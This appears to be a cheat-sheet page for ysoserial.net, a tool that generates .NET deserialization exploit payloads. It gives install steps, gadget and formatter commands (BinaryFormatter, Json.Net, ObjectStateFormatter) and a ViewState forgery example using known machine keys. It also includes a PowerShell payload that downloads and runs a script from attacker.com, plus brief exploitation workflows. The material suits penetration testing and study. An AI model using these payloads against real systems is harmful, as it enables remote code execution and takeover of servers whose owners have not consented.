Description
ysoserial.net generates payloads that exploit .NET deserialization vulnerabilities. It supports multiple formatters (BinaryFormatter, ObjectStateFormatter, Json.Net, etc.) and gadget chains targeting common .NET libraries.
Installation
BASH
# Download pre-built binary from releases
# https://github.com/pwntester/ysoserial.net/releases
# Or build from source (requires Visual Studio)
git clone https://github.com/pwntester/ysoserial.net.git
# Open in Visual Studio → BuildBasic Usage
BASH
# List available gadgets
ysoserial.exe -l
# Generate payload (TypeConfuseDelegate gadget, BinaryFormatter)
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc.exe" -o base64
# ObjectStateFormatter (ViewState)
ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami" -o base64Advanced Usage
BASH
# PSObject gadget (PowerShell)
ysoserial.exe -g PSObject -f BinaryFormatter -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
# Json.Net formatter
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
# ViewState exploitation (when MachineKey is known)
ysoserial.exe -p ViewState -g TextFormattingRunProperties \
--decryptionalg="AES" --decryptionkey="KEY" \
--validationalg="SHA1" --validationkey="KEY" \
--path="/target.aspx" -c "cmd /c whoami"
# Multiple output formats
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "whoami" -o raw
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "whoami" -o base64
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "whoami" -o hexCommon Workflows
BASH
# .NET ViewState exploitation
# Step 1: Identify ViewState in form (hidden __VIEWSTATE field)
# Step 2: Check if MAC validation is disabled
# Step 3: Generate payload and inject
# JSON.NET deserialization
# If the app accepts JSON with $type field:
# {"$type":"System.Windows.Data.ObjectDataProvider, ...", ...}